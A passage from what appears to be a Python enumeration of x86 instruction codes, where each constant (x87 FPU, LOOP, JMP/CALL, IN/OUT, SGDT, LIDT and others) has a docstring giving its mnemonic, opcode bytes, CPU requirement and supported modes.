``FSIN``
``D9 FE``
``387+``
``16/32/64-bit``
"""
FCOS: int = 552
"""
``FCOS``
``D9 FF``
``387+``
``16/32/64-bit``
"""
FIADD_M32INT: int = 553
"""
``FIADD m32int``
``DA /0``
``8087+``
``16/32/64-bit``
"""
FIMUL_M32INT: int = 554
"""
``FIMUL m32int``
``DA /1``
``8087+``
``16/32/64-bit``
"""
FICOM_M32INT: int = 555
"""
``FICOM m32int``
``DA /2``
``8087+``
``16/32/64-bit``
"""
FICOMP_M32INT: int = 556
"""
``FICOMP m32int``
``DA /3``
``8087+``
``16/32/64-bit``
"""
FISUB_M32INT: int = 557
"""
``FISUB m32int``
``DA /4``
``8087+``
``16/32/64-bit``
"""
FISUBR_M32INT: int = 558
"""
``FISUBR m32int``
``DA /5``
``8087+``
``16/32/64-bit``
"""
FIDIV_M32INT: int = 559
"""
``FIDIV m32int``
``DA /6``
``8087+``
``16/32/64-bit``
"""
FIDIVR_M32INT: int = 560
"""
``FIDIVR m32int``
``DA /7``
``8087+``
``16/32/64-bit``
"""
FCMOVB_ST0_STI: int = 561
"""
``FCMOVB ST(0), ST(i)``
``DA C0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVE_ST0_STI: int = 562
"""
``FCMOVE ST(0), ST(i)``
``DA C8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVBE_ST0_STI: int = 563
"""
``FCMOVBE ST(0), ST(i)``
``DA D0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVU_ST0_STI: int = 564
"""
``FCMOVU ST(0), ST(i)``
``DA D8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FUCOMPP: int = 565
"""
``FUCOMPP``
``DA E9``
``387+``
``16/32/64-bit``
"""
FILD_M32INT: int = 566
"""
``FILD m32int``
``DB /0``
``8087+``
``16/32/64-bit``
"""
FISTTP_M32INT: int = 567
"""
``FISTTP m32int``
``DB /1``
``8087+ and SSE3``
``16/32/64-bit``
"""
FIST_M32INT: int = 568
"""
``FIST m32int``
``DB /2``
``8087+``
``16/32/64-bit``
"""
FISTP_M32INT: int = 569
"""
``FISTP m32int``
``DB /3``
``8087+``
``16/32/64-bit``
"""
FLD_M80FP: int = 570
"""
``FLD m80fp``
``DB /5``
``8087+``
``16/32/64-bit``
"""
FSTP_M80FP: int = 571
"""
``FSTP m80fp``
``DB /7``
``8087+``
``16/32/64-bit``
"""
FCMOVNB_ST0_STI: int = 572
"""
``FCMOVNB ST(0), ST(i)``
``DB C0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVNE_ST0_STI: int = 573
"""
``FCMOVNE ST(0), ST(i)``
``DB C8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVNBE_ST0_STI: int = 574
"""
``FCMOVNBE ST(0), ST(i)``
``DB D0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCMOVNU_ST0_STI: int = 575
"""
``FCMOVNU ST(0), ST(i)``
``DB D8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FNENI: int = 576
"""
``FNENI``
``DB E0``
``8087+``
``16/32/64-bit``
"""
FENI: int = 577
"""
``FENI``
``9B DB E0``
``8087+``
``16/32/64-bit``
"""
FNDISI: int = 578
"""
``FNDISI``
``DB E1``
``8087+``
``16/32/64-bit``
"""
FDISI: int = 579
"""
``FDISI``
``9B DB E1``
``8087+``
``16/32/64-bit``
"""
FNCLEX: int = 580
"""
``FNCLEX``
``DB E2``
``8087+``
``16/32/64-bit``
"""
FCLEX: int = 581
"""
``FCLEX``
``9B DB E2``
``8087+``
``16/32/64-bit``
"""
FNINIT: int = 582
"""
``FNINIT``
``DB E3``
``8087+``
``16/32/64-bit``
"""
FINIT: int = 583
"""
``FINIT``
``9B DB E3``
``8087+``
``16/32/64-bit``
"""
FNSETPM: int = 584
"""
``FNSETPM``
``DB E4``
``287+``
``16/32/64-bit``
"""
FSETPM: int = 585
"""
``FSETPM``
``9B DB E4``
``287+``
``16/32/64-bit``
"""
FRSTPM: int = 586
"""
``FRSTPM``
``DB E5``
``287 XL``
``16/32-bit``
"""
FUCOMI_ST0_STI: int = 587
"""
``FUCOMI ST, ST(i)``
``DB E8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCOMI_ST0_STI: int = 588
"""
``FCOMI ST, ST(i)``
``DB F0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FADD_M64FP: int = 589
"""
``FADD m64fp``
``DC /0``
``8087+``
``16/32/64-bit``
"""
FMUL_M64FP: int = 590
"""
``FMUL m64fp``
``DC /1``
``8087+``
``16/32/64-bit``
"""
FCOM_M64FP: int = 591
"""
``FCOM m64fp``
``DC /2``
``8087+``
``16/32/64-bit``
"""
FCOMP_M64FP: int = 592
"""
``FCOMP m64fp``
``DC /3``
``8087+``
``16/32/64-bit``
"""
FSUB_M64FP: int = 593
"""
``FSUB m64fp``
``DC /4``
``8087+``
``16/32/64-bit``
"""
FSUBR_M64FP: int = 594
"""
``FSUBR m64fp``
``DC /5``
``8087+``
``16/32/64-bit``
"""
FDIV_M64FP: int = 595
"""
``FDIV m64fp``
``DC /6``
``8087+``
``16/32/64-bit``
"""
FDIVR_M64FP: int = 596
"""
``FDIVR m64fp``
``DC /7``
``8087+``
``16/32/64-bit``
"""
FADD_STI_ST0: int = 597
"""
``FADD ST(i), ST(0)``
``DC C0+i``
``8087+``
``16/32/64-bit``
"""
FMUL_STI_ST0: int = 598
"""
``FMUL ST(i), ST(0)``
``DC C8+i``
``8087+``
``16/32/64-bit``
"""
FCOM_ST0_STI_DCD0: int = 599
"""
``FCOM ST(i)``
``DC D0+i``
``8087+``
``16/32/64-bit``
"""
FCOMP_ST0_STI_DCD8: int = 600
"""
``FCOMP ST(i)``
``DC D8+i``
``8087+``
``16/32/64-bit``
"""
FSUBR_STI_ST0: int = 601
"""
``FSUBR ST(i), ST(0)``
``DC E0+i``
``8087+``
``16/32/64-bit``
"""
FSUB_STI_ST0: int = 602
"""
``FSUB ST(i), ST(0)``
``DC E8+i``
``8087+``
``16/32/64-bit``
"""
FDIVR_STI_ST0: int = 603
"""
``FDIVR ST(i), ST(0)``
``DC F0+i``
``8087+``
``16/32/64-bit``
"""
FDIV_STI_ST0: int = 604
"""
``FDIV ST(i), ST(0)``
``DC F8+i``
``8087+``
``16/32/64-bit``
"""
FLD_M64FP: int = 605
"""
``FLD m64fp``
``DD /0``
``8087+``
``16/32/64-bit``
"""
FISTTP_M64INT: int = 606
"""
``FISTTP m64int``
``DD /1``
``8087+ and SSE3``
``16/32/64-bit``
"""
FST_M64FP: int = 607
"""
``FST m64fp``
``DD /2``
``8087+``
``16/32/64-bit``
"""
FSTP_M64FP: int = 608
"""
``FSTP m64fp``
``DD /3``
``8087+``
``16/32/64-bit``
"""
FRSTOR_M94BYTE: int = 609
"""
``FRSTOR m94byte``
``o16 DD /4``
``8087+``
``16/32/64-bit``
"""
FRSTOR_M108BYTE: int = 610
"""
``FRSTOR m108byte``
``o32 DD /4``
``387+``
``16/32/64-bit``
"""
FNSAVE_M94BYTE: int = 611
"""
``FNSAVE m94byte``
``o16 DD /6``
``8087+``
``16/32/64-bit``
"""
FSAVE_M94BYTE: int = 612
"""
``FSAVE m94byte``
``9B o16 DD /6``
``8087+``
``16/32/64-bit``
"""
FNSAVE_M108BYTE: int = 613
"""
``FNSAVE m108byte``
``o32 DD /6``
``387+``
``16/32/64-bit``
"""
FSAVE_M108BYTE: int = 614
"""
``FSAVE m108byte``
``9B o32 DD /6``
``387+``
``16/32/64-bit``
"""
FNSTSW_M2BYTE: int = 615
"""
``FNSTSW m2byte``
``DD /7``
``8087+``
``16/32/64-bit``
"""
FSTSW_M2BYTE: int = 616
"""
``FSTSW m2byte``
``9B DD /7``
``8087+``
``16/32/64-bit``
"""
FFREE_STI: int = 617
"""
``FFREE ST(i)``
``DD C0+i``
``8087+``
``16/32/64-bit``
"""
FXCH_ST0_STI_DDC8: int = 618
"""
``FXCH ST(i)``
``DD C8+i``
``8087+``
``16/32/64-bit``
"""
FST_STI: int = 619
"""
``FST ST(i)``
``DD D0+i``
``8087+``
``16/32/64-bit``
"""
FSTP_STI: int = 620
"""
``FSTP ST(i)``
``DD D8+i``
``8087+``
``16/32/64-bit``
"""
FUCOM_ST0_STI: int = 621
"""
``FUCOM ST(i)``
``DD E0+i``
``8087+``
``16/32/64-bit``
"""
FUCOMP_ST0_STI: int = 622
"""
``FUCOMP ST(i)``
``DD E8+i``
``8087+``
``16/32/64-bit``
"""
FIADD_M16INT: int = 623
"""
``FIADD m16int``
``DE /0``
``8087+``
``16/32/64-bit``
"""
FIMUL_M16INT: int = 624
"""
``FIMUL m16int``
``DE /1``
``8087+``
``16/32/64-bit``
"""
FICOM_M16INT: int = 625
"""
``FICOM m16int``
``DE /2``
``8087+``
``16/32/64-bit``
"""
FICOMP_M16INT: int = 626
"""
``FICOMP m16int``
``DE /3``
``8087+``
``16/32/64-bit``
"""
FISUB_M16INT: int = 627
"""
``FISUB m16int``
``DE /4``
``8087+``
``16/32/64-bit``
"""
FISUBR_M16INT: int = 628
"""
``FISUBR m16int``
``DE /5``
``8087+``
``16/32/64-bit``
"""
FIDIV_M16INT: int = 629
"""
``FIDIV m16int``
``DE /6``
``8087+``
``16/32/64-bit``
"""
FIDIVR_M16INT: int = 630
"""
``FIDIVR m16int``
``DE /7``
``8087+``
``16/32/64-bit``
"""
FADDP_STI_ST0: int = 631
"""
``FADDP ST(i), ST(0)``
``DE C0+i``
``8087+``
``16/32/64-bit``
"""
FMULP_STI_ST0: int = 632
"""
``FMULP ST(i), ST(0)``
``DE C8+i``
``8087+``
``16/32/64-bit``
"""
FCOMP_ST0_STI_DED0: int = 633
"""
``FCOMP ST(i)``
``DE D0+i``
``8087+``
``16/32/64-bit``
"""
FCOMPP: int = 634
"""
``FCOMPP``
``DE D9``
``8087+``
``16/32/64-bit``
"""
FSUBRP_STI_ST0: int = 635
"""
``FSUBRP ST(i), ST(0)``
``DE E0+i``
``8087+``
``16/32/64-bit``
"""
FSUBP_STI_ST0: int = 636
"""
``FSUBP ST(i), ST(0)``
``DE E8+i``
``8087+``
``16/32/64-bit``
"""
FDIVRP_STI_ST0: int = 637
"""
``FDIVRP ST(i), ST(0)``
``DE F0+i``
``8087+``
``16/32/64-bit``
"""
FDIVP_STI_ST0: int = 638
"""
``FDIVP ST(i), ST(0)``
``DE F8+i``
``8087+``
``16/32/64-bit``
"""
FILD_M16INT: int = 639
"""
``FILD m16int``
``DF /0``
``8087+``
``16/32/64-bit``
"""
FISTTP_M16INT: int = 640
"""
``FISTTP m16int``
``DF /1``
``8087+ and SSE3``
``16/32/64-bit``
"""
FIST_M16INT: int = 641
"""
``FIST m16int``
``DF /2``
``8087+``
``16/32/64-bit``
"""
FISTP_M16INT: int = 642
"""
``FISTP m16int``
``DF /3``
``8087+``
``16/32/64-bit``
"""
FBLD_M80BCD: int = 643
"""
``FBLD m80bcd``
``DF /4``
``8087+``
``16/32/64-bit``
"""
FILD_M64INT: int = 644
"""
``FILD m64int``
``DF /5``
``8087+``
``16/32/64-bit``
"""
FBSTP_M80BCD: int = 645
"""
``FBSTP m80bcd``
``DF /6``
``8087+``
``16/32/64-bit``
"""
FISTP_M64INT: int = 646
"""
``FISTP m64int``
``DF /7``
``8087+``
``16/32/64-bit``
"""
FFREEP_STI: int = 647
"""
``FFREEP ST(i)``
``DF C0+i``
``8087+``
``16/32/64-bit``
"""
FXCH_ST0_STI_DFC8: int = 648
"""
``FXCH ST(i)``
``DF C8+i``
``8087+``
``16/32/64-bit``
"""
FSTP_STI_DFD0: int = 649
"""
``FSTP ST(i)``
``DF D0+i``
``8087+``
``16/32/64-bit``
"""
FSTP_STI_DFD8: int = 650
"""
``FSTP ST(i)``
``DF D8+i``
``8087+``
``16/32/64-bit``
"""
FNSTSW_AX: int = 651
"""
``FNSTSW AX``
``DF E0``
``287+``
``16/32/64-bit``
"""
FSTSW_AX: int = 652
"""
``FSTSW AX``
``9B DF E0``
``287+``
``16/32/64-bit``
"""
FSTDW_AX: int = 653
"""
``FSTDW AX``
``9B DF E1``
``387 SL``
``16/32-bit``
"""
FSTSG_AX: int = 654
"""
``FSTSG AX``
``9B DF E2``
``387 SL``
``16/32-bit``
"""
FUCOMIP_ST0_STI: int = 655
"""
``FUCOMIP ST, ST(i)``
``DF E8+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
FCOMIP_ST0_STI: int = 656
"""
``FCOMIP ST, ST(i)``
``DF F0+i``
``8087+ and CMOV``
``16/32/64-bit``
"""
LOOPNE_REL8_16_CX: int = 657
"""
``LOOPNE rel8``
``a16 o16 E0 cb``
``8086+``
``16/32-bit``
"""
LOOPNE_REL8_32_CX: int = 658
"""
``LOOPNE rel8``
``a16 o32 E0 cb``
``386+``
``16/32-bit``
"""
LOOPNE_REL8_16_ECX: int = 659
"""
``LOOPNE rel8``
``a32 o16 E0 cb``
``386+``
``16/32/64-bit``
"""
LOOPNE_REL8_32_ECX: int = 660
"""
``LOOPNE rel8``
``a32 o32 E0 cb``
``386+``
``16/32-bit``
"""
LOOPNE_REL8_64_ECX: int = 661
"""
``LOOPNE rel8``
``a32 o64 E0 cb``
``X64``
``64-bit``
"""
LOOPNE_REL8_16_RCX: int = 662
"""
``LOOPNE rel8``
``a64 o16 E0 cb``
``X64``
``64-bit``
"""
LOOPNE_REL8_64_RCX: int = 663
"""
``LOOPNE rel8``
``a64 o64 E0 cb``
``X64``
``64-bit``
"""
LOOPE_REL8_16_CX: int = 664
"""
``LOOPE rel8``
``a16 o16 E1 cb``
``8086+``
``16/32-bit``
"""
LOOPE_REL8_32_CX: int = 665
"""
``LOOPE rel8``
``a16 o32 E1 cb``
``386+``
``16/32-bit``
"""
LOOPE_REL8_16_ECX: int = 666
"""
``LOOPE rel8``
``a32 o16 E1 cb``
``386+``
``16/32/64-bit``
"""
LOOPE_REL8_32_ECX: int = 667
"""
``LOOPE rel8``
``a32 o32 E1 cb``
``386+``
``16/32-bit``
"""
LOOPE_REL8_64_ECX: int = 668
"""
``LOOPE rel8``
``a32 o64 E1 cb``
``X64``
``64-bit``
"""
LOOPE_REL8_16_RCX: int = 669
"""
``LOOPE rel8``
``a64 o16 E1 cb``
``X64``
``64-bit``
"""
LOOPE_REL8_64_RCX: int = 670
"""
``LOOPE rel8``
``a64 o64 E1 cb``
``X64``
``64-bit``
"""
LOOP_REL8_16_CX: int = 671
"""
``LOOP rel8``
``a16 o16 E2 cb``
``8086+``
``16/32-bit``
"""
LOOP_REL8_32_CX: int = 672
"""
``LOOP rel8``
``a16 o32 E2 cb``
``386+``
``16/32-bit``
"""
LOOP_REL8_16_ECX: int = 673
"""
``LOOP rel8``
``a32 o16 E2 cb``
``386+``
``16/32/64-bit``
"""
LOOP_REL8_32_ECX: int = 674
"""
``LOOP rel8``
``a32 o32 E2 cb``
``386+``
``16/32-bit``
"""
LOOP_REL8_64_ECX: int = 675
"""
``LOOP rel8``
``a32 o64 E2 cb``
``X64``
``64-bit``
"""
LOOP_REL8_16_RCX: int = 676
"""
``LOOP rel8``
``a64 o16 E2 cb``
``X64``
``64-bit``
"""
LOOP_REL8_64_RCX: int = 677
"""
``LOOP rel8``
``a64 o64 E2 cb``
``X64``
``64-bit``
"""
JCXZ_REL8_16: int = 678
"""
``JCXZ rel8``
``a16 o16 E3 cb``
``8086+``
``16/32-bit``
"""
JCXZ_REL8_32: int = 679
"""
``JCXZ rel8``
``a16 o32 E3 cb``
``386+``
``16/32-bit``
"""
JECXZ_REL8_16: int = 680
"""
``JECXZ rel8``
``a32 o16 E3 cb``
``386+``
``16/32/64-bit``
"""
JECXZ_REL8_32: int = 681
"""
``JECXZ rel8``
``a32 o32 E3 cb``
``386+``
``16/32-bit``
"""
JECXZ_REL8_64: int = 682
"""
``JECXZ rel8``
``a32 o64 E3 cb``
``X64``
``64-bit``
"""
JRCXZ_REL8_16: int = 683
"""
``JRCXZ rel8``
``a64 o16 E3 cb``
``X64``
``64-bit``
"""
JRCXZ_REL8_64: int = 684
"""
``JRCXZ rel8``
``a64 o64 E3 cb``
``X64``
``64-bit``
"""
IN_AL_IMM8: int = 685
"""
``IN AL, imm8``
``E4 ib``
``8086+``
``16/32/64-bit``
"""
IN_AX_IMM8: int = 686
"""
``IN AX, imm8``
``o16 E5 ib``
``8086+``
``16/32/64-bit``
"""
IN_EAX_IMM8: int = 687
"""
``IN EAX, imm8``
``o32 E5 ib``
``386+``
``16/32/64-bit``
"""
OUT_IMM8_AL: int = 688
"""
``OUT imm8, AL``
``E6 ib``
``8086+``
``16/32/64-bit``
"""
OUT_IMM8_AX: int = 689
"""
``OUT imm8, AX``
``o16 E7 ib``
``8086+``
``16/32/64-bit``
"""
OUT_IMM8_EAX: int = 690
"""
``OUT imm8, EAX``
``o32 E7 ib``
``386+``
``16/32/64-bit``
"""
CALL_REL16: int = 691
"""
``CALL rel16``
``o16 E8 cw``
``8086+``
``16/32/64-bit``
"""
CALL_REL32_32: int = 692
"""
``CALL rel32``
``o32 E8 cd``
``386+``
``16/32-bit``
"""
CALL_REL32_64: int = 693
"""
``CALL rel32``
``o64 E8 cd``
``X64``
``64-bit``
"""
JMP_REL16: int = 694
"""
``JMP rel16``
``o16 E9 cw``
``8086+``
``16/32/64-bit``
"""
JMP_REL32_32: int = 695
"""
``JMP rel32``
``o32 E9 cd``
``386+``
``16/32-bit``
"""
JMP_REL32_64: int = 696
"""
``JMP rel32``
``o64 E9 cd``
``X64``
``64-bit``
"""
JMP_PTR1616: int = 697
"""
``JMP ptr16:16``
``o16 EA cd``
``8086+``
``16/32-bit``
"""
JMP_PTR1632: int = 698
"""
``JMP ptr16:32``
``o32 EA cp``
``386+``
``16/32-bit``
"""
JMP_REL8_16: int = 699
"""
``JMP rel8``
``o16 EB cb``
``8086+``
``16/32/64-bit``
"""
JMP_REL8_32: int = 700
"""
``JMP rel8``
``o32 EB cb``
``386+``
``16/32-bit``
"""
JMP_REL8_64: int = 701
"""
``JMP rel8``
``o64 EB cb``
``X64``
``64-bit``
"""
IN_AL_DX: int = 702
"""
``IN AL, DX``
``EC``
``8086+``
``16/32/64-bit``
"""
IN_AX_DX: int = 703
"""
``IN AX, DX``
``o16 ED``
``8086+``
``16/32/64-bit``
"""
IN_EAX_DX: int = 704
"""
``IN EAX, DX``
``o32 ED``
``386+``
``16/32/64-bit``
"""
OUT_DX_AL: int = 705
"""
``OUT DX, AL``
``EE``
``8086+``
``16/32/64-bit``
"""
OUT_DX_AX: int = 706
"""
``OUT DX, AX``
``o16 EF``
``8086+``
``16/32/64-bit``
"""
OUT_DX_EAX: int = 707
"""
``OUT DX, EAX``
``o32 EF``
``386+``
``16/32/64-bit``
"""
INT1: int = 708
"""
``INT1``
``F1``
``386+``
``16/32/64-bit``
"""
HLT: int = 709
"""
``HLT``
``F4``
``8086+``
``16/32/64-bit``
"""
CMC: int = 710
"""
``CMC``
``F5``
``8086+``
``16/32/64-bit``
"""
TEST_RM8_IMM8: int = 711
"""
``TEST r/m8, imm8``
``F6 /0 ib``
``8086+``
``16/32/64-bit``
"""
TEST_RM8_IMM8_F6R1: int = 712
"""
``TEST r/m8, imm8``
``F6 /1 ib``
``8086+``
``16/32/64-bit``
"""
NOT_RM8: int = 713
"""
``NOT r/m8``
``F6 /2``
``8086+``
``16/32/64-bit``
"""
NEG_RM8: int = 714
"""
``NEG r/m8``
``F6 /3``
``8086+``
``16/32/64-bit``
"""
MUL_RM8: int = 715
"""
``MUL r/m8``
``F6 /4``
``8086+``
``16/32/64-bit``
"""
IMUL_RM8: int = 716
"""
``IMUL r/m8``
``F6 /5``
``8086+``
``16/32/64-bit``
"""
DIV_RM8: int = 717
"""
``DIV r/m8``
``F6 /6``
``8086+``
``16/32/64-bit``
"""
IDIV_RM8: int = 718
"""
``IDIV r/m8``
``F6 /7``
``8086+``
``16/32/64-bit``
"""
TEST_RM16_IMM16: int = 719
"""
``TEST r/m16, imm16``
``o16 F7 /0 iw``
``8086+``
``16/32/64-bit``
"""
TEST_RM32_IMM32: int = 720
"""
``TEST r/m32, imm32``
``o32 F7 /0 id``
``386+``
``16/32/64-bit``
"""
TEST_RM64_IMM32: int = 721
"""
``TEST r/m64, imm32``
``o64 F7 /0 id``
``X64``
``64-bit``
"""
TEST_RM16_IMM16_F7R1: int = 722
"""
``TEST r/m16, imm16``
``o16 F7 /1 iw``
``8086+``
``16/32/64-bit``
"""
TEST_RM32_IMM32_F7R1: int = 723
"""
``TEST r/m32, imm32``
``o32 F7 /1 id``
``386+``
``16/32/64-bit``
"""
TEST_RM64_IMM32_F7R1: int = 724
"""
``TEST r/m64, imm32``
``o64 F7 /1 id``
``X64``
``64-bit``
"""
NOT_RM16: int = 725
"""
``NOT r/m16``
``o16 F7 /2``
``8086+``
``16/32/64-bit``
"""
NOT_RM32: int = 726
"""
``NOT r/m32``
``o32 F7 /2``
``386+``
``16/32/64-bit``
"""
NOT_RM64: int = 727
"""
``NOT r/m64``
``o64 F7 /2``
``X64``
``64-bit``
"""
NEG_RM16: int = 728
"""
``NEG r/m16``
``o16 F7 /3``
``8086+``
``16/32/64-bit``
"""
NEG_RM32: int = 729
"""
``NEG r/m32``
``o32 F7 /3``
``386+``
``16/32/64-bit``
"""
NEG_RM64: int = 730
"""
``NEG r/m64``
``o64 F7 /3``
``X64``
``64-bit``
"""
MUL_RM16: int = 731
"""
``MUL r/m16``
``o16 F7 /4``
``8086+``
``16/32/64-bit``
"""
MUL_RM32: int = 732
"""
``MUL r/m32``
``o32 F7 /4``
``386+``
``16/32/64-bit``
"""
MUL_RM64: int = 733
"""
``MUL r/m64``
``o64 F7 /4``
``X64``
``64-bit``
"""
IMUL_RM16: int = 734
"""
``IMUL r/m16``
``o16 F7 /5``
``8086+``
``16/32/64-bit``
"""
IMUL_RM32: int = 735
"""
``IMUL r/m32``
``o32 F7 /5``
``386+``
``16/32/64-bit``
"""
IMUL_RM64: int = 736
"""
``IMUL r/m64``
``o64 F7 /5``
``X64``
``64-bit``
"""
DIV_RM16: int = 737
"""
``DIV r/m16``
``o16 F7 /6``
``8086+``
``16/32/64-bit``
"""
DIV_RM32: int = 738
"""
``DIV r/m32``
``o32 F7 /6``
``386+``
``16/32/64-bit``
"""
DIV_RM64: int = 739
"""
``DIV r/m64``
``o64 F7 /6``
``X64``
``64-bit``
"""
IDIV_RM16: int = 740
"""
``IDIV r/m16``
``o16 F7 /7``
``8086+``
``16/32/64-bit``
"""
IDIV_RM32: int = 741
"""
``IDIV r/m32``
``o32 F7 /7``
``386+``
``16/32/64-bit``
"""
IDIV_RM64: int = 742
"""
``IDIV r/m64``
``o64 F7 /7``
``X64``
``64-bit``
"""
CLC: int = 743
"""
``CLC``
``F8``
``8086+``
``16/32/64-bit``
"""
STC: int = 744
"""
``STC``
``F9``
``8086+``
``16/32/64-bit``
"""
CLI: int = 745
"""
``CLI``
``FA``
``8086+``
``16/32/64-bit``
"""
STI: int = 746
"""
``STI``
``FB``
``8086+``
``16/32/64-bit``
"""
CLD: int = 747
"""
``CLD``
``FC``
``8086+``
``16/32/64-bit``
"""
STD: int = 748
"""
``STD``
``FD``
``8086+``
``16/32/64-bit``
"""
INC_RM8: int = 749
"""
``INC r/m8``
``FE /0``
``8086+``
``16/32/64-bit``
"""
DEC_RM8: int = 750
"""
``DEC r/m8``
``FE /1``
``8086+``
``16/32/64-bit``
"""
INC_RM16: int = 751
"""
``INC r/m16``
``o16 FF /0``
``8086+``
``16/32/64-bit``
"""
INC_RM32: int = 752
"""
``INC r/m32``
``o32 FF /0``
``386+``
``16/32/64-bit``
"""
INC_RM64: int = 753
"""
``INC r/m64``
``o64 FF /0``
``X64``
``64-bit``
"""
DEC_RM16: int = 754
"""
``DEC r/m16``
``o16 FF /1``
``8086+``
``16/32/64-bit``
"""
DEC_RM32: int = 755
"""
``DEC r/m32``
``o32 FF /1``
``386+``
``16/32/64-bit``
"""
DEC_RM64: int = 756
"""
``DEC r/m64``
``o64 FF /1``
``X64``
``64-bit``
"""
CALL_RM16: int = 757
"""
``CALL r/m16``
``o16 FF /2``
``8086+``
``16/32/64-bit``
"""
CALL_RM32: int = 758
"""
``CALL r/m32``
``o32 FF /2``
``386+``
``16/32-bit``
"""
CALL_RM64: int = 759
"""
``CALL r/m64``
``o64 FF /2``
``X64``
``64-bit``
"""
CALL_M1616: int = 760
"""
``CALL m16:16``
``o16 FF /3``
``8086+``
``16/32/64-bit``
"""
CALL_M1632: int = 761
"""
``CALL m16:32``
``o32 FF /3``
``386+``
``16/32/64-bit``
"""
CALL_M1664: int = 762
"""
``CALL m16:64``
``o64 FF /3``
``X64``
``64-bit``
"""
JMP_RM16: int = 763
"""
``JMP r/m16``
``o16 FF /4``
``8086+``
``16/32/64-bit``
"""
JMP_RM32: int = 764
"""
``JMP r/m32``
``o32 FF /4``
``386+``
``16/32-bit``
"""
JMP_RM64: int = 765
"""
``JMP r/m64``
``o64 FF /4``
``X64``
``64-bit``
"""
JMP_M1616: int = 766
"""
``JMP m16:16``
``o16 FF /5``
``8086+``
``16/32/64-bit``
"""
JMP_M1632: int = 767
"""
``JMP m16:32``
``o32 FF /5``
``386+``
``16/32/64-bit``
"""
JMP_M1664: int = 768
"""
``JMP m16:64``
``o64 FF /5``
``X64``
``64-bit``
"""
PUSH_RM16: int = 769
"""
``PUSH r/m16``
``o16 FF /6``
``8086+``
``16/32/64-bit``
"""
PUSH_RM32: int = 770
"""
``PUSH r/m32``
``o32 FF /6``
``386+``
``16/32-bit``
"""
PUSH_RM64: int = 771
"""
``PUSH r/m64``
``o64 FF /6``
``X64``
``64-bit``
"""
SLDT_RM16: int = 772
"""
``SLDT r/m16``
``o16 0F 00 /0``
``286+``
``16/32/64-bit``
"""
SLDT_R32M16: int = 773
"""
``SLDT r32/m16``
``o32 0F 00 /0``
``386+``
``16/32/64-bit``
"""
SLDT_R64M16: int = 774
"""
``SLDT r64/m16``
``o64 0F 00 /0``
``X64``
``64-bit``
"""
STR_RM16: int = 775
"""
``STR r/m16``
``o16 0F 00 /1``
``286+``
``16/32/64-bit``
"""
STR_R32M16: int = 776
"""
``STR r32/m16``
``o32 0F 00 /1``
``386+``
``16/32/64-bit``
"""
STR_R64M16: int = 777
"""
``STR r64/m16``
``o64 0F 00 /1``
``X64``
``64-bit``
"""
LLDT_RM16: int = 778
"""
``LLDT r/m16``
``o16 0F 00 /2``
``286+``
``16/32/64-bit``
"""
LLDT_R32M16: int = 779
"""
``LLDT r32/m16``
``o32 0F 00 /2``
``386+``
``16/32/64-bit``
"""
LLDT_R64M16: int = 780
"""
``LLDT r64/m16``
``o64 0F 00 /2``
``X64``
``64-bit``
"""
LTR_RM16: int = 781
"""
``LTR r/m16``
``o16 0F 00 /3``
``286+``
``16/32/64-bit``
"""
LTR_R32M16: int = 782
"""
``LTR r32/m16``
``o32 0F 00 /3``
``386+``
``16/32/64-bit``
"""
LTR_R64M16: int = 783
"""
``LTR r64/m16``
``o64 0F 00 /3``
``X64``
``64-bit``
"""
VERR_RM16: int = 784
"""
``VERR r/m16``
``o16 0F 00 /4``
``286+``
``16/32/64-bit``
"""
VERR_R32M16: int = 785
"""
``VERR r32/m16``
``o32 0F 00 /4``
``386+``
``16/32/64-bit``
"""
VERR_R64M16: int = 786
"""
``VERR r64/m16``
``o64 0F 00 /4``
``X64``
``64-bit``
"""
VERW_RM16: int = 787
"""
``VERW r/m16``
``o16 0F 00 /5``
``286+``
``16/32/64-bit``
"""
VERW_R32M16: int = 788
"""
``VERW r32/m16``
``o32 0F 00 /5``
``386+``
``16/32/64-bit``
"""
VERW_R64M16: int = 789
"""
``VERW r64/m16``
``o64 0F 00 /5``
``X64``
``64-bit``
"""
JMPE_RM16: int = 790
"""
``JMPE r/m16``
``o16 0F 00 /6``
``IA-64``
``16/32-bit``
"""
JMPE_RM32: int = 791
"""
``JMPE r/m32``
``o32 0F 00 /6``
``IA-64``
``16/32-bit``
"""
SGDT_M1632_16: int = 792
"""
``SGDT m``
``o16 0F 01 /0``
``286+``
``16/32-bit``
"""
SGDT_M1632: int = 793
"""
``SGDT m``
``o32 0F 01 /0``
``386+``
``16/32-bit``
"""
SGDT_M1664: int = 794
"""
``SGDT m``
``0F 01 /0``
``X64``
``64-bit``
"""
SIDT_M1632_16: int = 795
"""
``SIDT m``
``o16 0F 01 /1``
``286+``
``16/32-bit``
"""
SIDT_M1632: int = 796
"""
``SIDT m``
``o32 0F 01 /1``
``386+``
``16/32-bit``
"""
SIDT_M1664: int = 797
"""
``SIDT m``
``0F 01 /1``
``X64``
``64-bit``
"""
LGDT_M1632_16: int = 798
"""
``LGDT m16&32``
``o16 0F 01 /2``
``286+``
``16/32-bit``
"""
LGDT_M1632: int = 799
"""
``LGDT m16&32``
``o32 0F 01 /2``
``386+``
``16/32-bit``
"""
LGDT_M1664: int = 800
"""
``LGDT m16&64``
``0F 01 /2``
``X64``
``64-bit``
"""
LIDT_M1632_16: int = 801
"""
``LIDT m16&32``
``o16 0F 01 /3``
``286+``
``16/32-bit``
"""
LIDT_M1632: int = 802
"""
``LIDT m16&32``
``o32 0F 01 /3``
``386+``
``16/32-bit``
"""
LIDT_M1664: int = 803
"""
``LIDT m16&64``
``0F 01 /3``
``X64``
``64-bit``
"""
SMSW_RM16: int = 804
"""
``SMSW r/m16``
``o16 0F 01 /4``
``286+``
``16/32/64-bit``
"""
SMSW_R32M16: int = 805
"""
``SMSW r32/m16``
``o32 0F 01 /4``
``386+``
``16/32/64-bit``
"""
SMSW_R64M16: int = 806
"""
``SMSW r64/m16``
``o64 0F 01 /4``
``X64``
``64-bit``
"""
RSTORSSP_M64: int = 807
"""
